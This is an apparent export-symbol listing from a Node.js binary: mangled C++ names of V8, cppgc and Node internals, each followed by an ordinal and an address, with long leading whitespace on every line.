                                                                                                                                                                                                                                    ?CurrentEmbeddedBlobCodeSize@Isolate@internal@v8@@SAIXZ49260x140b67980
                                                                                                                                                                                                                                    ?CurrentEmbeddedBlobData@Isolate@internal@v8@@SAPEBEXZ49270x140b67990
                                                                                                                                                                                                                                    ?CurrentEmbeddedBlobDataSize@Isolate@internal@v8@@SAIXZ49280x140b679a0
                                                                                                                                                                                                                                    ?CurrentEmbeddedBlobIsBinaryEmbedded@Isolate@internal@v8@@SA_NXZ49290x140b679b0
                                                                                                                                                                                                                                    ?CurrentEmbedderAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ49300x140b1a4a0
                                                                                                                                                                                                                                    ?CurrentEpoch@GCTracer@internal@v8@@QEBAIW4ScopeId@Scope@123@@Z49310x140a98500
                                                                                                                                                                                                                                    ?CurrentFrameCount@Debug@internal@v8@@AEAAHXZ49320x140bb8f60
                                                                                                                                                                                                                                    ?CurrentLiteralAsCString@Scanner@internal@v8@@QEBAPEBDPEAVZone@23@@Z49330x14087ec10
                                                                                                                                                                                                                                    ?CurrentLocalHeap@Isolate@internal@v8@@QEAAPEAVLocalHeap@23@XZ49340x140b679d0
                                                                                                                                                                                                                                    ?CurrentMarkCompactMutatorUtilization@GCTracer@internal@v8@@QEBANXZ49350x140b1a4b0
                                                                                                                                                                                                                                    ?CurrentMarkingBarrier@WriteBarrier@internal@v8@@SAPEAVMarkingBarrier@23@PEAVHeap@23@@Z49360x140b163b0
                                                                                                                                                                                                                                    ?CurrentMatches@Scanner@internal@v8@@QEBA_NW4Value@Token@23@@Z49370x14053eb60
                                                                                                                                                                                                                                    ?CurrentOldGenerationAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ49380x140b1a4c0
                                                                                                                                                                                                                                    ?CurrentPerIsolateThreadData@Isolate@internal@v8@@SAPEAVPerIsolateThreadData@123@XZ49390x14053eb70
                                                                                                                                                                                                                                    ?CurrentRawSymbol@Scanner@internal@v8@@QEBAPEBVAstRawString@23@PEAVAstValueFactory@23@@Z49400x14087ec90
                                                                                                                                                                                                                                    ?CurrentScriptNameOrSourceURL@Isolate@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ49410x140b67a00
                                                                                                                                                                                                                                    ?CurrentScriptNameOrSourceURL@StackTrace@v8@@SA?AV?$Local@VString@v8@@@2@PEAVIsolate@2@@Z49420x140c7fde0
                                                                                                                                                                                                                                    ?CurrentSourcePosition@BytecodeArrayBuilder@interpreter@internal@v8@@AEAA?AVBytecodeSourceInfo@234@W4Bytecode@234@@Z49430x140a5d820
                                                                                                                                                                                                                                    ?CurrentStackTrace@StackTrace@v8@@SA?AV?$Local@VStackTrace@v8@@@2@PEAVIsolate@2@HW4StackTraceOptions@12@@Z49440x140c7fe40
                                                                                                                                                                                                                                    ?CurrentSymbol@Scanner@internal@v8@@QEBAPEBVAstRawString@23@PEAVAstValueFactory@23@@Z49450x14087ece0
                                                                                                                                                                                                                                    ?CurrentTimeToMarkingTask@IncrementalMarking@internal@v8@@AEBANXZ49460x140af5ce0
                                                                                                                                                                                                                                    ?CustomSpace@RawHeap@internal@cppgc@@QEAAPEAVBaseSpace@23@UCustomSpaceIndex@3@@Z49470x1405200d0
                                                                                                                                                                                                                                    ?CustomSpace@RawHeap@internal@cppgc@@QEBAPEBVBaseSpace@23@UCustomSpaceIndex@3@@Z49480x1405200d0
                                                                                                                                                                                                                                    ?Cvtlsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49490x1405f5ef0
                                                                                                                                                                                                                                    ?Cvtlsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49500x1405f5fc0
                                                                                                                                                                                                                                    ?Cvtlsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49510x1405f6060
                                                                                                                                                                                                                                    ?Cvtlsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49520x1405f6120
                                                                                                                                                                                                                                    ?Cvtlui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49530x1405f61c0
                                                                                                                                                                                                                                    ?Cvtlui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49540x1405f6220
                                                                                                                                                                                                                                    ?Cvtlui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49550x1405f6260
                                                                                                                                                                                                                                    ?Cvtlui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49560x1405f62c0
                                                                                                                                                                                                                                    ?Cvtqsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49570x1405f6300
                                                                                                                                                                                                                                    ?Cvtqsi2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49580x1405f63d0
                                                                                                                                                                                                                                    ?Cvtqsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49590x1405f6470
                                                                                                                                                                                                                                    ?Cvtqsi2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49600x1405f6530
                                                                                                                                                                                                                                    ?Cvtqui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49610x1405f65d0
                                                                                                                                                                                                                                    ?Cvtqui2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49620x1405f6630
                                                                                                                                                                                                                                    ?Cvtqui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49630x1405f67a0
                                                                                                                                                                                                                                    ?Cvtqui2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VRegister@23@@Z49640x1405f6800
                                                                                                                                                                                                                                    ?Cvtsd2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z49650x1405f6970
                                                                                                                                                                                                                                    ?Cvtsd2ss@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49660x1405f69e0
                                                                                                                                                                                                                                    ?Cvtss2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z49670x1405f6a60
                                                                                                                                                                                                                                    ?Cvtss2sd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@VOperand@23@@Z49680x1405f6ad0
                                                                                                                                                                                                                                    ?Cvttsd2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z49690x1405f6b50
                                                                                                                                                                                                                                    ?Cvttsd2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z49700x1405f6bd0
                                                                                                                                                                                                                                    ?Cvttsd2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z49710x1405f6c30
                                                                                                                                                                                                                                    ?Cvttsd2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z49720x1405f6cb0
                                                                                                                                                                                                                                    ?Cvttsd2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@PEAVLabel@23@@Z49730x1405f6d10
                                                                                                                                                                                                                                    ?Cvttsd2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@PEAVLabel@23@@Z49740x1405f6d40
                                                                                                                                                                                                                                    ?Cvttss2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z49750x1405f6d50
                                                                                                                                                                                                                                    ?Cvttss2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z49760x1405f6dd0
                                                                                                                                                                                                                                    ?Cvttss2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z49770x1405f6e30
                                                                                                                                                                                                                                    ?Cvttss2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z49780x1405f6eb0
                                                                                                                                                                                                                                    ?Cvttss2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@PEAVLabel@23@@Z49790x1405f6f10
                                                                                                                                                                                                                                    ?Cvttss2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@PEAVLabel@23@@Z49800x1405f6f40
                                                                                                                                                                                                                                    ?DCheckImpl@internal@cppgc@@YAXPEBDAEBVSourceLocation@2@@Z49810x140517130
                                                                                                                                                                                                                                    ?DFSPop@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneStack@UDFSStackEntry@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@@Z49820x141253bc0
                                                                                                                                                                                                                                    ?DFSPush@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneStack@UDFSStackEntry@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@1W4DFSDirection@1234@@Z49830x141253c80
                                                                                                                                                                                                                                    ?DOM@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB49840x142298c88
                                                                                                                                                                                                                                    ?Data@BackingStore@v8@@QEBAPEAXXZ49850x140097290
                                                                                                                                                                                                                                    ?Data@Buffer@node@@YAPEADV?$Local@VObject@v8@@@v8@@@Z49860x140222f00
                                                                                                                                                                                                                                    ?Data@Buffer@node@@YAPEADV?$Local@VValue@v8@@@v8@@@Z49870x140222f10
                                                                                                                                                                                                                                    ?DataAlign@Assembler@internal@v8@@QEAAXH@Z49880x140c0f040
                                                                                                                                                                                                                                    ?DataConstant@Descriptor@internal@v8@@SA?AV123@PEAVIsolate@23@V?$Handle@VName@internal@v8@@@23@HV?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z49890x1408f3490
                                                                                                                                                                                                                                    ?DataConstant@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z49900x1408f3540
                                                                                                                                                                                                                                    ?DataField@Descriptor@internal@v8@@SA?AV123@PEAVIsolate@23@V?$Handle@VName@internal@v8@@@23@HW4PropertyAttributes@23@VRepresentation@23@@Z49910x1408f35f0
                                                                                                                                                                                                                                    ?DataField@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@HW4PropertyAttributes@23@W4PropertyConstness@23@VRepresentation@23@AEBVMaybeObjectHandle@23@@Z49920x1408f3660
                                                                                                                                                                                                                                    ?DataTableEndOffset@SwissNameDictionary@internal@v8@@SAHH@Z49930x14053eb40
                                                                                                                                                                                                                                    ?DataTableSize@SwissNameDictionary@internal@v8@@SAHH@Z49940x14053eb80
                                                                                                                                                                                                                                    ?DataTableStartOffset@SwissNameDictionary@internal@v8@@SAHXZ49950x1400a92d0
                                                                                                                                                                                                                                    ?DateNow@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ49960x1410d72f0
                                                                                                                                                                                                                                    ?DateTimeConfigurationChangeNotification@Isolate@v8@@QEAAXW4TimeZoneDetection@12@@Z49970x140c7fea0
                                                                                                                                                                                                                                    ?Date_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ49980x14053eb90
                                                                                                                                                                                                                                    ?Date_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ49990x1407df500
                                                                                                                                                                                                                                    ?DaylightSavingsOffsetInMs@DateCache@internal@v8@@AEAAH_J@Z50000x140bd5cb0
                                                                                                                                                                                                                                    ?DaysFromTime@DateCache@internal@v8@@SAH_J@Z50010x140818190
                                                                                                                                                                                                                                    ?DaysFromYearMonth@DateCache@internal@v8@@QEAAHHH@Z50020x140bd6280
                                                                                                                                                                                                                                    ?Dead@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ50030x141039a50
                                                                                                                                                                                                                                    ?Dead@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ50040x14105c980
                                                                                                                                                                                                                                    ?DeadValue@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4MachineRepresentation@34@@Z50050x141039a60
                                                                                                                                                                                                                                    ?DeadValue@DeadCodeElimination@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@@Z50060x141135630
                                                                                                                                                                                                                                    ?DebugBreak@CodeAssembler@compiler@internal@v8@@QEAAXXZ50070x1410a8c40
                                                                                                                                                                                                                                    ?DebugBreak@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@XZ50080x1410e2350
                                                                                                                                                                                                                                    ?DebugBreak@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ50090x141051870
                                                                                                                                                                                                                                    ?DebugBreak@OS@base@v8@@SAXXZ50100x140ff3a50
                                                                                                                                                                                                                                    ?DebugBreak@RawMachineAssembler@compiler@internal@v8@@QEAAXXZ50110x141218df0
                                                                                                                                                                                                                                    ?DebugBreak@TurboAssembler@internal@v8@@QEAAXXZ50120x1405f6f50
                                                                                                                                                                                                                                    ?DebugCommand@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB50130x142298c80
                                                                                                                                                                                                                                    ?DebugName@CallInterfaceDescriptor@internal@v8@@QEBAPEBDXZ50140x140be0fc0
                                                                                                                                                                                                                                    ?DebugName@WasmCode@wasm@internal@v8@@AEBA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ50150x1406602b0
                                                                                                                                                                                                                                    ?Debugger@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ50160x140a5d890
                                                                                                                                                                                                                                    ?Debugger@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ50170x1410c3fc0
                                                                                                                                                                                                                                    ?DecRef@CodeEntryStorage@internal@v8@@QEAAXPEAVCodeEntry@23@@Z50180x140866190
                                                                                                                                                                                                                                    ?DecRef@WasmCode@wasm@internal@v8@@QEAA_NXZ50190x14053eba0
                                                                                                                                                                                                                                    ?DecRefOnDeadCode@WasmCode@wasm@internal@v8@@QEAA_NXZ50200x14053ebc0
                                                                                                                                                                                                                                    ?DecRefOnLiveCode@WasmCode@wasm@internal@v8@@QEAAXXZ50210x14053ebe0
                                                                                                                                                                                                                                    ?DecRefOnPotentiallyDeadCode@WasmCode@wasm@internal@v8@@AEAA_NXZ50220x140660680
                                                                                                                                                                                                                                    ?DecideCondition@CommonOperatorReducer@compiler@internal@v8@@AEAA?AW4Decision@234@QEAVNode@234@@Z50230x1411276f0
                                                                                                                                                                                                                                    ?Declare@Parser@internal@v8@@AEAAXPEAVDeclaration@23@PEBVAstRawString@23@W4VariableKind@23@W4VariableMode@23@W4InitializationFlag@23@PEAVScope@23@PEA_NHH@Z50240x1408bb000
                                                                                                                                                                                                                                    ?Declare@Scope@internal@v8@@AEAAPEAVVariable@23@PEAVZone@23@PEBVAstRawString@23@W4VariableMode@23@W4VariableKind@23@W4InitializationFlag@23@W4MaybeAssignedFlag@23@PEA_N@Z50250x1407fe980
                                                                                                                                                                                                                                    ?DeclareAndBindVariable@Parser@internal@v8@@AEAAXPEAVVariableProxy@23@W4VariableKind@23@W4VariableMode@23@PEAVScope@23@PEA_NH@Z50260x1408bb100
                                                                                                                                                                                                                                    ?DeclareArguments@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z50270x140c63d70
                                                                                                                                                                                                                                    ?DeclareArrowFunctionFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@AEBULocation@Scanner@23@@Z50280x1408bb180
                                                                                                                                                                                                                                    ?DeclareBoundVariable@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEBVAstRawString@23@W4VariableMode@23@H@Z50290x1408bb2c0
                                                                                                                                                                                                                                    ?DeclareBrandVariable@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@W4IsStaticFlag@23@H@Z50300x140c63e20
                                                                                                                                                                                                                                    ?DeclareCatchVariableName@Parser@internal@v8@@AEAAPEAVVariable@23@PEAVScope@23@PEBVAstRawString@23@@Z50310x14088e430
                                                                                                                                                                                                                                    ?DeclareCatchVariableName@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@@Z50320x140c63f50
                                                                                                                                                                                                                                    ?DeclareClass@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@PEAVExpression@23@PEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@HH@Z50330x1408bb3b0
                                                                                                                                                                                                                                    ?DeclareClassVariable@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@PEBVAstRawString@23@H@Z50340x140c63fb0
                                                                                                                                                                                                                                    ?DeclareClassVariable@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEBVAstRawString@23@PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@H@Z50350x1408bb4e0
                                                                                                                                                                                                                                    ?DeclareDefaultFunctionVariables@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z50360x140c64040
                                                                                                                                                                                                                                    ?DeclareDynamicGlobal@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableKind@23@PEAVScope@23@@Z50370x140c641a0
                                                                                                                                                                                                                                    ?DeclareFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@@Z50380x14088e440
                                                                                                                                                                                                                                    ?DeclareFunction@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@PEAVFunctionLiteral@23@W4VariableMode@23@W4VariableKind@23@HHPEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@@Z50390x1408bb580
                                                                                                                                                                                                                                    ?DeclareFunctionNameVar@Parser@internal@v8@@AEAAXPEBVAstRawString@23@W4FunctionSyntaxKind@23@PEAVDeclarationScope@23@@Z50400x1408bb780
                                                                                                                                                                                                                                    ?DeclareFunctionVar@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@PEAVScope@23@@Z50410x140c641f0
                                                                                                                                                                                                                                    ?DeclareGeneratorObjectVar@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@@Z50420x140c64320
                                                                                                                                                                                                                                    ?DeclareHomeObjectVariable@Scope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@@Z50430x140c643b0
                                                                                                                                                                                                                                    ?DeclareIdentifier@Parser@internal@v8@@AEAAXPEBVAstRawString@23@H@Z50440x14088e530
                                                                                                                                                                                                                                    ?DeclareLabel@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAPEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@0PEBVAstRawString@23@@Z50450x14088e540
                                                                                                                                                                                                                                    ?DeclareLocal@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@W4VariableKind@23@PEA_NW4InitializationFlag@23@@Z50460x140c64420
                                                                                                                                                                                                                                    ?DeclareNative@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@H@Z50470x1408bb7c0
                                                                                                                                                                                                                                    ?DeclareParameter@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@_N2PEAVAstValueFactory@23@H@Z50480x140c644d0
                                                                                                                                                                                                                                    ?DeclarePrivateClassMember@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEBVAstRawString@23@PEAVClassLiteralProperty@23@W4Kind@623@_NPEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z50490x1408bb910
                                                                                                                                                                                                                                    ?DeclarePrivateName@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@W4IsStaticFlag@23@PEA_N@Z50500x140c64660
                                                                                                                                                                                                                                    ?DeclarePublicClassField@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEAVClassLiteralProperty@23@_N2PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z50510x1408bba40
                                                                                                                                                                                                                                    ?DeclarePublicClassMethod@Parser@internal@v8@@AEAAXPEBVAstRawString@23@PEAVClassLiteralProperty@23@_NPEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z50520x1408bbb40
                                                                                                                                                                                                                                    ?DeclareSloppyBlockFunction@DeclarationScope@internal@v8@@QEAAXPEAVSloppyBlockFunctionStatement@23@@Z50530x140c647f0
                                                                                                                                                                                                                                    ?DeclareStaticHomeObjectVariable@Scope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@@Z50540x140c64810
                                                                                                                                                                                                                                    ?DeclareThis@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z50550x140c64880
                                                                                                                                                                                                                                    ?DeclareUnboundVariable@Parser@internal@v8@@AEAAXPEBVAstRawString@23@W4VariableMode@23@W4InitializationFlag@23@H@Z50560x1408bbbc0
                                                                                                                                                                                                                                    ?DeclareVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableKind@23@W4VariableMode@23@W4InitializationFlag@23@PEAVScope@23@PEA_NHH@Z50570x1408bbc10
                                                                                                                                                                                                                                    ?DeclareVariable@Scope@internal@v8@@QEAAPEAVVariable@23@PEAVDeclaration@23@PEBVAstRawString@23@HW4VariableMode@23@W4VariableKind@23@W4InitializationFlag@23@PEA_N55@Z50580x140c64940
                                                                                                                                                                                                                                    ?DeclareVariableName@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@PEA_NW4VariableKind@23@@Z50590x140c64ad0
                                                                                                                                                                                                                                    ?Decode@BytecodeDecoder@interpreter@internal@v8@@SAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV56@PEBE@Z50600x140a4f860
                                                                                                                                                                                                                                    ?Decode@Disassembler@internal@v8@@SAHPEAVIsolate@23@AEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@PEAE2VCodeReference@23@_K@Z50610x140b9cd60
                                                                                                                                                                                                                                    ?DecodeBytes@node@@YA_JPEAVIsolate@v8@@V?$Local@VValue@v8@@@3@W4encoding@1@@Z50620x14029fc10
                                                                                                                                                                                                                                    ?DecodeCustomSections@wasm@internal@v8@@YA?AV?$vector@UCustomSectionOffset@wasm@internal@v8@@V?$allocator@UCustomSectionOffset@wasm@internal@v8@@@std@@@std@@PEBE0@Z50630x14067f970
                                                                                                                                                                                                                                    ?DecodeExternalPointerImpl@internal@v8@@YA_KPEBVIsolate@12@_KW4ExternalPointerTag@12@@Z50640x140097130
                                                                                                                                                                                                                                    ?DecodeI32ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAI1@Z50650x140623e00
                                                                                                                                                                                                                                    ?DecodeI64ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAIPEA_K@Z50660x140623e50
                                                                                                                                                                                                                                    ?DecodeLocalDecls@wasm@internal@v8@@YA_NAEBVWasmFeatures@123@PEAUBodyLocalDecls@123@PEBUWasmModule@123@PEBE3@Z50670x1406c9650
                                                                                                                                                                                                                                    ?DecodeMapping@WasmModuleSourceMap@wasm@internal@v8@@AEAA_NAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z50680x140630990
                                                                                                                                                                                                                                    ?DecodeRegisterListOperand@BytecodeDecoder@interpreter@internal@v8@@SA?AVRegisterList@234@_KIW4OperandType@234@W4OperandScale@234@@Z50690x140a50a30
                                                                                                                                                                                                                                    ?DecodeRegisterOperand@BytecodeDecoder@interpreter@internal@v8@@SA?AVRegister@234@_KW4OperandType@234@W4OperandScale@234@@Z50700x140a50ab0
                                                                                                                                                                                                                                    ?DecodeSLeb128@EhFrameIterator@internal@v8@@CAHPEBEPEAH@Z50710x140b9b120
                                                                                                                                                                                                                                    ?DecodeSandboxedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z50720x14050fb40
                                                                                                                                                                                                                                    ?DecodeSignedOperand@BytecodeDecoder@interpreter@internal@v8@@SAH_KW4OperandType@234@W4OperandScale@234@@Z50730x140a50b50
                                                                                                                                                                                                                                    ?DecodeULeb128@EhFrameIterator@internal@v8@@CAIPEBEPEAH@Z50740x140b9b180
                                                                                                                                                                                                                                    ?DecodeUnsignedOperand@BytecodeDecoder@interpreter@internal@v8@@SAI_KW4OperandType@234@W4OperandScale@234@@Z50750x140a50bb0
                                                                                                                                                                                                                                    ?DecodeWasmFunctionForTesting@wasm@internal@v8@@YA?AV?$Result@V?$unique_ptr@UWasmFunction@wasm@internal@v8@@U?$default_delete@UWasmFunction@wasm@internal@v8@@@std@@@std@@@123@AEBVWasmFeatures@123@PEAVZone@23@AEBUModuleWireBytes@123@PEBUWasmModule@123@PEBE4PEAVCounters@23@@Z50760x1406852b0
                                                                                                                                                                                                                                    ?DecodeWasmInitExprForTesting@wasm@internal@v8@@YA?AVConstantExpression@123@AEBVWasmFeatures@123@PEBE1VValueType@123@@Z50770x140685480
                                                                                                                                                                                                                                    ?DecodeWasmModule@wasm@internal@v8@@YA?AV?$Result@V?$shared_ptr@UWasmModule@wasm@internal@v8@@@std@@@123@AEBVWasmFeatures@123@PEBE1_NW4ModuleOrigin@123@PEAVCounters@23@V?$shared_ptr@VRecorder@metrics@internal@v8@@@std@@VContextId@Recorder@metrics@3@W4DecodingMethod@123@PEAVAccountingAllocator@23@@Z50780x1406855a0
                                                                                                                                                                                                                                    ?DecodeWasmSignatureForTesting@wasm@internal@v8@@YAPEBV?$Signature@VValueType@wasm@internal@v8@@@23@AEBVWasmFeatures@123@PEAVZone@23@PEBE2@Z50790x140685a00
                                                                                                                                                                                                                                    ?DecodeWrite@node@@YA_JPEAVIsolate@v8@@PEAD_KV?$Local@VValue@v8@@@3@W4encoding@1@@Z50800x14029fc80
                                                                                                                                                                                                                                    ?Decommit@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@@Z50810x1406606c0
                                                                                                                                                                                                                                    ?DecommitPages@AddressSpaceReservation@base@v8@@QEAA_NPEAX_K@Z50820x140ff3a60
                                                                                                                                                                                                                                    ?DecommitPages@BoundedPageAllocator@base@v8@@UEAA_NPEAX_K@Z50830x140ffb960
                                                                                                                                                                                                                                    ?DecommitPages@OS@base@v8@@CA_NPEAX_K@Z50840x140ff3a90
                                                                                                                                                                                                                                    ?DecommitPages@PageAllocator@base@v8@@UEAA_NPEAX_K@Z50850x140ff63a0
                                                                                                                                                                                                                                    ?DecommitPages@VirtualAddressSpace@base@v8@@UEAA_N_K0@Z50860x140ff63a0
                                                                                                                                                                                                                                    ?DecommitPages@VirtualAddressSubspace@base@v8@@UEAA_N_K0@Z50870x140ffc4a0
                                                                                                                                                                                                                                    ?Decompress@SnapshotCompression@internal@v8@@SA?AVSnapshotData@23@V?$Vector@$$CBE@base@3@@Z50880x1407d4f80
                                                                                                                                                                                                                                    ?DecompressAnyTagged@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z50890x1405f6f60
                                                                                                                                                                                                                                    ?DecompressTaggedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@0@Z50900x1405f6fc0
                                                                                                                                                                                                                                    ?DecompressTaggedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z50910x1405f6f60
                                                                                                                                                                                                                                    ?DecompressTaggedSigned@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z50920x1405a6290
                                                                                                                                                                                                                                    ?Decorate@Graph@compiler@internal@v8@@QEAAXPEAVNode@234@@Z50930x1410dd8c0
                                                                                                                                                                                                                                    ?DecreaseAllocatedBytes@PagedSpace@internal@v8@@QEAAX_KPEAVPage@23@@Z50940x14053ebf0
                                                                                                                                                                                                                                    ?DecreaseAllocatedSize@EmbedderHeapTracer@v8@@QEAAX_K@Z50950x140c7ff10
                                                                                                                                                                                                                                    ?DecreaseAllocatedSize@LocalEmbedderHeapTracer@internal@v8@@QEAAX_K@Z50960x140a98530
                                                                                                                                                                                                                                    ?DecreaseCapacity@PagedSpace@internal@v8@@QEAAX_K@Z50970x14053ec00
                                                                                                                                                                                                                                    ?DecreaseLimit@PagedSpace@internal@v8@@AEAAX_K@Z50980x140aac720
                                                                                                                                                                                                                                    ?Decrement@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z50990x1410c3fd0
                                                                                                                                                                                                                                    ?DecrementCommittedPhysicalMemory@PagedSpace@internal@v8@@QEAAX_K@Z51000x140aac8b0
                                                                                                                                                                                                                                    ?DecrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z51010x140559780
                                                                                                                                                                                                                                    ?DecrementDiscardedMemory@StatsCollector@internal@cppgc@@QEAAX_K@Z51020x140509480
                                                                                                                                                                                                                                    ?DecrementExternalBackingStoreBytes@Space@internal@v8@@QEAAXW4ExternalBackingStoreType@23@_K@Z51030x14053ec10
                                                                                                                                                                                                                                    ?DecrementMicrotasksScopeDepth@MicrotaskQueue@internal@v8@@QEAAXXZ51040x14053ec40
                                                                                                                                                                                                                                    ?DecrementMicrotasksSuppressions@MicrotaskQueue@internal@v8@@QEAAXXZ51050x14053ec50
                                                                                                                                                                                                                                    ?DecrementRefCount@WasmCode@wasm@internal@v8@@SAXV?$Vector@QEAVWasmCode@wasm@internal@v8@@@base@4@@Z51060x140660720
                                                                                                                                                                                                                                    ?DecrementTracingIndentation@JSHeapBroker@compiler@internal@v8@@QEAAXXZ51070x1410b6d00
